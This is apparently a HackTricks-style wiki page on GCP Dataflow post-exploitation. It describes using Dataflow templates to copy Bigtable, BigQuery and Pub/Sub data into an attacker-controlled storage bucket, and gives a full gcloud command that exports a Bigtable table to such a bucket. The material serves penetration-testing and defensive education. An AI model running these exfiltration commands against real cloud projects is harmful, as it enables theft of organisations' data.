GCP - Dataflow Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Dataflow
For more information about Dataflow check:
{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}
Using Dataflow to exfiltrate data from other services
Permissions: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs (over a SA with access to source and sink)
With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow accessβfor example via the Dataflow Rider privilege escalation (pipeline takeover via bucket write).
Bigtable to GCS
See GCP - Bigtable Post Exploitation β "Dump rows to your bucket" for the full pattern. Templates: Cloud_Bigtable_to_GCS_Json, Cloud_Bigtable_to_GCS_Parquet, Cloud_Bigtable_to_GCS_SequenceFile.
Export Bigtable to attacker-controlled bucket
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
--staging-location=gs://<YOUR_BUCKET>/staging/
BigQuery to GCS
Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
Pub/Sub and streaming sources
Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
References
{{#include ../../../banners/hacktricks-training.md}}